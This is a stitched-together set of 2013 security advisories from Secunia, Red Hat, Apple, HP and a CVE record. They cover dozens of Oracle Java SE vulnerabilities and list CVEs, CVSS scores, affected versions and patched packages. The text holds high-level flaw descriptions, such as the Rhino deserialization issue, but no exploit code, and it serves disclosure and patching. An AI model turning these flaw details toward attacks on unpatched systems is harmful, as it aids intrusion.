10) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
11) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
12) An unspecified error in the JMX component of the client
deployment can be exploited to potentially execute arbitrary code.
13) An unspecified error in the JavaFX component of the client
deployment can be exploited to potentially execute arbitrary code.
14) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
15) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
16) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
17) An unspecified error in the Scripting component of the client
deployment can be exploited to potentially execute arbitrary code.
18) An unspecified error in the Sound component of the client
deployment can be exploited to potentially execute arbitrary code.
19) An unspecified error in the Beans component of the client
deployment can be exploited to potentially execute arbitrary code.
20) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
21) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
22) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
23) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose and manipulate certain data
and cause a DoS.
24) An unspecified error in the Install component of the client
deployment can be exploited by a local user to gain escalated
privileges.
25) An unspecified error in the AWT component of the client
deployment can be exploited to disclose and manipulate certain data.
26) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
27) An unspecified error in the Deployment component of the client
deployment can be exploited to manipulate certain data.
28) An unspecified error in the JAX-WS component of the client
deployment can be exploited to disclose certain data.
29) An unspecified error in the JAXP component of the client
deployment can be exploited to disclose certain data.
30) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
31) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
32) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
33) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
34) An unspecified error in the Networking component of the client
deployment can be exploited to manipulate certain data.
35) An unspecified error in the RMI component of the client
deployment can be exploited to manipulate certain data.
36) An unspecified error in the JSSE component of the server
deployment can be exploited via SSL/TLS to cause a DoS.
37) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
38) An unspecified error in the JSSE component of the client
deployment can be exploited via SSL/TLS to disclose and manipulate
certain data.
The vulnerabilities are reported in the following products:
* JDK and JRE 7 Update 11 and earlier.
* JDK and JRE 6 Update 38 and earlier.
* JDK and JRE 5.0 Update 38 and earlier.
* SDK and JRE 1.4.2_40 and earlier.
SOLUTION:
Apply updates.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
One of the vulnerabilities is reported as a 0-day. It is currently
unclear who reported the remaining vulnerabilities as the Oracle Jave
SE Critical Patch Update for February 2013 only provides a bundled
list of credits. This section will be updated when/if the original
reporter provides more information.
ORIGINAL ADVISORY:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201302-0020 | CVE-2012-3213 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Scripting. Java 7 Update 11, Java 6 Update 38, and earlier versions of Java contain vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. (DoS) An attack may be carried out. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists due to insufficient checks during deserialization in the NativeJavaConstructor class that is part of the Rhino JavaScript Engine. This allows for the construction of otherwise privileged objects which can lead to remote code execution under the context of the current user.
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it.
This vulnerability affects the following supported versions:
7 Update 11, 6 Update 38. In a typical operating environment, these are of low security risk as
the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-02-01-1 Java for Mac OS X v10.6 Update 12
Java for Mac OS X v10.6 Update 12 is now available and addresses the
following:
Java
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact: Multiple vulnerabilities in Java 1.6.0_37
Description: Multiple vulnerabilities exist in Java 1.6.0_37, the
most serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox.
Download and install the updates from The HP Software Support Online (SSO). -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Critical: java-1.6.0-sun security update
Advisory ID: RHSA-2013:0236-01
Product: Red Hat Enterprise Linux Extras
Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0236.html
Issue date: 2013-02-04
CVE Names: CVE-2012-1541 CVE-2012-3213 CVE-2012-3342
CVE-2013-0351 CVE-2013-0409 CVE-2013-0419
CVE-2013-0423 CVE-2013-0424 CVE-2013-0425
CVE-2013-0426 CVE-2013-0427 CVE-2013-0428
CVE-2013-0429 CVE-2013-0430 CVE-2013-0432
CVE-2013-0433 CVE-2013-0434 CVE-2013-0435
CVE-2013-0438 CVE-2013-0440 CVE-2013-0441
CVE-2013-0442 CVE-2013-0443 CVE-2013-0445
CVE-2013-0446 CVE-2013-0450 CVE-2013-1473
CVE-2013-1475 CVE-2013-1476 CVE-2013-1478
CVE-2013-1480 CVE-2013-1481
=====================================================================
1. Summary:
Updated java-1.6.0-sun packages that fix several security issues are now
available for Red Hat Enterprise Linux 5 and 6 Supplementary.
The Red Hat Security Response Team has rated this update as having critical
security impact. Common Vulnerability Scoring System (CVSS) base scores,
which give detailed severity ratings, are available for each vulnerability
from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64
Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64
Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64
3.
(CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351, CVE-2013-0409,
CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425, CVE-2013-0426,
CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0430, CVE-2013-0432,
CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440,
CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0446,
CVE-2013-0450, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476, CVE-2013-1478,
CVE-2013-1480, CVE-2013-1481)
All users of java-1.6.0-sun are advised to upgrade to these updated
packages, which provide Oracle Java 6 Update 39. All running instances of
Oracle Java must be restarted for the update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
5. Bugs fixed (http://bugzilla.redhat.com/):
859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906930 - CVE-2013-0430 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Install)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907224 - CVE-2013-1481 Oracle JDK: unspecified vulnerability fixed in 6u39 (Sound)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.i586.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.4.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.i686.rpm
x86_64:
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-demo-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.i686.rpm
java-1.6.0-sun-devel-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-jdbc-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-plugin-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
java-1.6.0-sun-src-1.6.0.39-1jpp.1.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0429.html
https://www.redhat.com/security/data/cve/CVE-2013-0430.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1475.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1481.html
https://access.redhat.com/security/updates/classification/#critical
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFREE7WXlSAg2UNWIIRAuWTAJ4g2iIk0XnUEpbIXz6nDgDjaHxz7ACbBcjy
gqkoqFew2BZDYA/n817qYO8=
=m5pJ
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Oracle Java Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA52064
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52064/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52064/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52064/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Oracle Java, which can
be exploited by malicious local users to gain escalated privileges and
by malicious people to disclose certain sensitive information,
manipulate certain data, cause a DoS (Denial of Service), and
compromise a vulnerable system.
1) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
2) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
5) An unspecified error in the AWT component of the client and server
deployment can be exploited to potentially execute arbitrary code.
23) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose and manipulate certain data
and cause a DoS.
24) An unspecified error in the Install component of the client
deployment can be exploited by a local user to gain escalated
privileges.
25) An unspecified error in the AWT component of the client
deployment can be exploited to disclose and manipulate certain data.
26) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
27) An unspecified error in the Deployment component of the client
deployment can be exploited to manipulate certain data.
28) An unspecified error in the JAX-WS component of the client
deployment can be exploited to disclose certain data.
29) An unspecified error in the JAXP component of the client
deployment can be exploited to disclose certain data.
30) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
31) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
32) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
33) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
34) An unspecified error in the Networking component of the client
deployment can be exploited to manipulate certain data.
35) An unspecified error in the RMI component of the client
deployment can be exploited to manipulate certain data.
36) An unspecified error in the JSSE component of the server
deployment can be exploited via SSL/TLS to cause a DoS.
37) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
38) An unspecified error in the JSSE component of the client
deployment can be exploited via SSL/TLS to disclose and manipulate
certain data.
The vulnerabilities are reported in the following products:
* JDK and JRE 7 Update 11 and earlier.
* JDK and JRE 6 Update 38 and earlier.
* JDK and JRE 5.0 Update 38 and earlier.
* SDK and JRE 1.4.2_40 and earlier.
SOLUTION:
Apply updates.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
One of the vulnerabilities is reported as a 0-day. It is currently
unclear who reported the remaining vulnerabilities as the Oracle Jave
SE Critical Patch Update for February 2013 only provides a bundled
list of credits. This section will be updated when/if the original
reporter provides more information.
ORIGINAL ADVISORY:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03725347
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03725347
Version: 1
HPSBUX02864 SSRT101156 rev.1 - HP-UX Running Java, Remote Unauthorized
Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-04-03
Last Updated: 2013-04-03
Potential Security Impact: Remote unauthorized access, disclosure of
information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime
Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These
vulnerabilities could allow remote unauthorized access, disclosure of
information, and other exploits.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.17 and
earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0419 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0423 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0424 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0425 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0426 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0427 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0428 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0429 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6
CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0
CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
